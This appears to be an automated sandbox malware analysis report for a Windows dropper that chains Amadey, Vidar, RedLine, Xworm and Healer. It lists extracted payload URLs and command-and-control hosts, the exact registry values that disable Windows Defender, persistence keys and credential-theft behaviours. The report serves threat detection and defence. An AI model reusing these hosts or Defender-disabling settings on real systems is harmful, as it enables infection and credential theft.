Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
19-02-2025 04:01
Static task
static1
Behavioral task
behavioral1
Sample
5bdefb9f7366ddf3b5d7002cc9cee37ec0bbfddc76ea28d5d667e4563f3c92c0.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
5bdefb9f7366ddf3b5d7002cc9cee37ec0bbfddc76ea28d5d667e4563f3c92c0.exe
Resource
win10v2004-20250217-en
General
-
Target
5bdefb9f7366ddf3b5d7002cc9cee37ec0bbfddc76ea28d5d667e4563f3c92c0.exe
-
Size
2.0MB
-
MD5
20804890273fa0387262be080ed29b18
-
SHA1
daa8c33e3bb0fd2e9e110e51add443e1c22cd1f3
-
SHA256
5bdefb9f7366ddf3b5d7002cc9cee37ec0bbfddc76ea28d5d667e4563f3c92c0
-
SHA512
1e871a66b28999f7e35fa226ad4b544f3b42b1385125c10ffa63533075761a6563b258be9bc5e7c4230a34366cb24945d313b45f0bdef3253c473309296cf149
-
SSDEEP
49152:/B8o1FVx0yYWCNKlxIGZNv3IkpIu3U6+:5fzMWrZrpIuk
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
systembc
cobolrationumelawrtewarms.co:4001
93.186.202.3:4001
-
dns
5.132.191.104
ns1.vic.au.dns.opennic.glue
ns2.vic.au.dns.opennic.glue
Extracted
vidar
https://t.me/g02f04
https://steamcommunity.com/profiles/76561199828130190
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Signatures
-
Amadey family
-
Detect Vidar Stealer 14 IoCs
resource yara_rule behavioral2/memory/4508-307-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/4508-309-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/4508-455-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/4508-494-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/4508-500-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/4508-503-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/4508-749-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/4508-755-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/4508-758-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/4508-763-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/4508-772-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/4508-786-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/4508-790-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/4508-810-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/files/0x000a000000023d21-867.dat family_xworm -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/3036-123-0x0000000000F60000-0x00000000013C0000-memory.dmp healer behavioral2/memory/3036-122-0x0000000000F60000-0x00000000013C0000-memory.dmp healer behavioral2/memory/3036-276-0x0000000000F60000-0x00000000013C0000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempGKYN6U3NW15NEHJK4LOAXWN4LUYXLSJI.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection TempGKYN6U3NW15NEHJK4LOAXWN4LUYXLSJI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempGKYN6U3NW15NEHJK4LOAXWN4LUYXLSJI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempGKYN6U3NW15NEHJK4LOAXWN4LUYXLSJI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempGKYN6U3NW15NEHJK4LOAXWN4LUYXLSJI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempGKYN6U3NW15NEHJK4LOAXWN4LUYXLSJI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempGKYN6U3NW15NEHJK4LOAXWN4LUYXLSJI.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempGKYN6U3NW15NEHJK4LOAXWN4LUYXLSJI.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempGKYN6U3NW15NEHJK4LOAXWN4LUYXLSJI.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications TempGKYN6U3NW15NEHJK4LOAXWN4LUYXLSJI.EXE -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Redline family
-
Systembc family
-
Vidar family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 24 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d74fb7ce47.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 468d16e1f1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 683611a9bc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8ac9a0a6fe.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ oVpNTUm.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3omTNLZ.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 58c84746f6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempGKYN6U3NW15NEHJK4LOAXWN4LUYXLSJI.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ qjvk.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3omTNLZ.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e64ecd84aa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5bdefb9f7366ddf3b5d7002cc9cee37ec0bbfddc76ea28d5d667e4563f3c92c0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0f776c5c7d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ db6d21c192.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d2YQIJa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dfc4ae4b5d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ggffr.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ aaededfc8c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempWMMLVE7PS9ZQV4SFCWIHSVINV6L23NSN.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ oVpNTUm.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Blocklisted process makes network request 64 IoCs
flow pid Process 21 1436 powershell.exe 27 2160 powershell.exe 126 5476 powershell.exe 129 5476 powershell.exe 142 5476 powershell.exe 143 5476 powershell.exe 160 5476 powershell.exe 169 5476 powershell.exe 174 5476 powershell.exe 179 5476 powershell.exe 182 5476 powershell.exe 186 5476 powershell.exe 190 5476 powershell.exe 193 5476 powershell.exe 200 5476 powershell.exe 205 5476 powershell.exe 206 5476 powershell.exe 207 5476 powershell.exe 208 5476 powershell.exe 209 5476 powershell.exe 210 5476 powershell.exe 211 5476 powershell.exe 212 5476 powershell.exe 213 5476 powershell.exe 214 5476 powershell.exe 215 5476 powershell.exe 216 5476 powershell.exe 217 5476 powershell.exe 218 5476 powershell.exe 219 5476 powershell.exe 223 5476 powershell.exe 234 5476 powershell.exe 246 5476 powershell.exe 253 5476 powershell.exe 254 5476 powershell.exe 258 5476 powershell.exe 260 5476 powershell.exe 261 5476 powershell.exe 262 5476 powershell.exe 263 5476 powershell.exe 264 5476 powershell.exe 265 5476 powershell.exe 266 5476 powershell.exe 267 5476 powershell.exe 268 5476 powershell.exe 269 5476 powershell.exe 270 5476 powershell.exe 271 5476 powershell.exe 272 5476 powershell.exe 273 5476 powershell.exe 274 5476 powershell.exe 275 5476 powershell.exe 276 5476 powershell.exe 277 5476 powershell.exe 278 5476 powershell.exe 279 5476 powershell.exe 280 5476 powershell.exe 281 5476 powershell.exe 284 5476 powershell.exe 285 5476 powershell.exe 286 5476 powershell.exe 288 5476 powershell.exe 290 5476 powershell.exe 291 5476 powershell.exe -
pid Process 2336 powershell.exe 2020 powershell.exe 2388 powershell.exe 4020 powershell.exe 2160 powershell.exe 5848 powershell.exe 5904 powershell.exe 1436 powershell.exe -
Downloads MZ/PE file 37 IoCs
flow pid Process 17 4740 skotes.exe 17 4740 skotes.exe 17 4740 skotes.exe 17 4740 skotes.exe 17 4740 skotes.exe 17 4740 skotes.exe 17 4740 skotes.exe 17 4740 skotes.exe 17 4740 skotes.exe 17 4740 skotes.exe 17 4740 skotes.exe 17 4740 skotes.exe 17 4740 skotes.exe 17 4740 skotes.exe 17 4740 skotes.exe 17 4740 skotes.exe 17 4740 skotes.exe 17 4740 skotes.exe 46 5016 futors.exe 46 5016 futors.exe 46 5016 futors.exe 336 4740 skotes.exe 336 4740 skotes.exe 336 4740 skotes.exe 338 2852 BitLockerToGo.exe 536 2032 0f776c5c7d.exe 536 2032 0f776c5c7d.exe 536 2032 0f776c5c7d.exe 536 2032 0f776c5c7d.exe 536 2032 0f776c5c7d.exe 536 2032 0f776c5c7d.exe 117 5016 futors.exe 19 4740 skotes.exe 321 720 BitLockerToGo.exe 21 1436 powershell.exe 27 2160 powershell.exe 390 5904 powershell.exe -
Uses browser remote debugging 2 TTPs 18 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 1700 chrome.exe 4468 msedge.exe 2384 chrome.exe 6772 msedge.exe 7164 msedge.exe 4404 chrome.exe 2716 chrome.exe 5596 msedge.exe 5188 msedge.exe 6716 msedge.exe 1020 msedge.exe 2896 chrome.exe 5756 msedge.exe 1944 msedge.exe 2040 chrome.exe 5444 msedge.exe 5532 chrome.exe 1944 chrome.exe -
Checks BIOS information in registry 2 TTPs 48 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion qjvk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ggffr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempWMMLVE7PS9ZQV4SFCWIHSVINV6L23NSN.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion db6d21c192.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempWMMLVE7PS9ZQV4SFCWIHSVINV6L23NSN.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5bdefb9f7366ddf3b5d7002cc9cee37ec0bbfddc76ea28d5d667e4563f3c92c0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempGKYN6U3NW15NEHJK4LOAXWN4LUYXLSJI.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion qjvk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d74fb7ce47.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e64ecd84aa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ggffr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8ac9a0a6fe.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0f776c5c7d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 468d16e1f1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 683611a9bc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion aaededfc8c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion aaededfc8c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dfc4ae4b5d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8ac9a0a6fe.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0f776c5c7d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempGKYN6U3NW15NEHJK4LOAXWN4LUYXLSJI.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 683611a9bc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion db6d21c192.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 58c84746f6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 58c84746f6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5bdefb9f7366ddf3b5d7002cc9cee37ec0bbfddc76ea28d5d667e4563f3c92c0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e64ecd84aa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d74fb7ce47.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 468d16e1f1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dfc4ae4b5d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation 7aencsM.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation 5bdefb9f7366ddf3b5d7002cc9cee37ec0bbfddc76ea28d5d667e4563f3c92c0.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation amnew.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C3hYpvm.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C3hYpvm.exe -
Executes dropped EXE 52 IoCs
pid Process 4740 skotes.exe 3404 oVpNTUm.exe 3076 19e091b2fd.exe 3036 TempGKYN6U3NW15NEHJK4LOAXWN4LUYXLSJI.EXE 2756 3omTNLZ.exe 4660 qjvk.exe 4324 amnew.exe 5016 futors.exe 4020 483d2fa8a0d53818306efeb32d3.exe 1240 d74fb7ce47.exe 5084 3omTNLZ.exe 4236 7aencsM.exe 320 7aencsM.exe 4508 7aencsM.exe 3628 trano1221.exe 2296 DTQCxXZ.exe 1660 trano1221.exe 2156 con12312211221.exe 4936 con12312211221.exe 3628 oVpNTUm.exe 5836 monthdragon.exe 5964 monthdragon.exe 2160 qFqSpAp.exe 552 12321321.exe 5896 Bjkm5hE.exe 4352 Bjkm5hE.exe 1996 Bjkm5hE.exe 2784 skotes.exe 5284 C3hYpvm.exe 6024 alex12112.exe 5216 futors.exe 1660 alex12112.exe 1312 ggffr.exe 2536 d2YQIJa.exe 5948 Ta3ZyUR.exe 5756 Ta3ZyUR.exe 5216 7ff0b5b35b.exe 5348 552ed52fd7.exe 4748 e64ecd84aa.exe 5792 468d16e1f1.exe 5376 aaededfc8c.exe 1460 683611a9bc.exe 4844 dfc4ae4b5d.exe 5848 8ac9a0a6fe.exe 3080 skotes.exe 4656 futors.exe 2032 0f776c5c7d.exe 4780 9dfd665e3d.exe 632 1995896c1c.exe 7140 TempWMMLVE7PS9ZQV4SFCWIHSVINV6L23NSN.EXE 5888 db6d21c192.exe 6048 58c84746f6.exe -
Identifies Wine through registry keys 2 TTPs 24 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine oVpNTUm.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine e64ecd84aa.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 468d16e1f1.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 683611a9bc.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine dfc4ae4b5d.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 8ac9a0a6fe.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine TempWMMLVE7PS9ZQV4SFCWIHSVINV6L23NSN.EXE Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine db6d21c192.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 3omTNLZ.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine d74fb7ce47.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine d2YQIJa.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 0f776c5c7d.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 5bdefb9f7366ddf3b5d7002cc9cee37ec0bbfddc76ea28d5d667e4563f3c92c0.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine TempGKYN6U3NW15NEHJK4LOAXWN4LUYXLSJI.EXE Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine oVpNTUm.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine ggffr.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine aaededfc8c.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine qjvk.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 3omTNLZ.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 58c84746f6.exe -
Loads dropped DLL 33 IoCs
pid Process 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 1660 trano1221.exe 2032 0f776c5c7d.exe 2032 0f776c5c7d.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features TempGKYN6U3NW15NEHJK4LOAXWN4LUYXLSJI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempGKYN6U3NW15NEHJK4LOAXWN4LUYXLSJI.EXE -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9dfd665e3d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086700001\\9dfd665e3d.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1995896c1c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086701001\\1995896c1c.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\19e091b2fd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086592101\\19e091b2fd.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086593021\\am_no.cmd" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" C3hYpvm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8ac9a0a6fe.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086698001\\8ac9a0a6fe.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0f776c5c7d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086699001\\0f776c5c7d.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 d74fb7ce47.exe -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0011000000023adc-47.dat autoit_exe behavioral2/files/0x000d000000023d62-1620.dat autoit_exe behavioral2/files/0x000d000000023d6b-1673.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 24 IoCs
pid Process 4488 5bdefb9f7366ddf3b5d7002cc9cee37ec0bbfddc76ea28d5d667e4563f3c92c0.exe 4740 skotes.exe 3404 oVpNTUm.exe 3036 TempGKYN6U3NW15NEHJK4LOAXWN4LUYXLSJI.EXE 2756 3omTNLZ.exe 4660 qjvk.exe 4020 483d2fa8a0d53818306efeb32d3.exe 1240 d74fb7ce47.exe 5084 3omTNLZ.exe 3628 oVpNTUm.exe 2784 skotes.exe 1312 ggffr.exe 2536 d2YQIJa.exe 4748 e64ecd84aa.exe 5792 468d16e1f1.exe 5376 aaededfc8c.exe 1460 683611a9bc.exe 4844 dfc4ae4b5d.exe 5848 8ac9a0a6fe.exe 3080 skotes.exe 2032 0f776c5c7d.exe 7140 TempWMMLVE7PS9ZQV4SFCWIHSVINV6L23NSN.EXE 5888 db6d21c192.exe 6048 58c84746f6.exe -
Suspicious use of SetThreadContext 9 IoCs
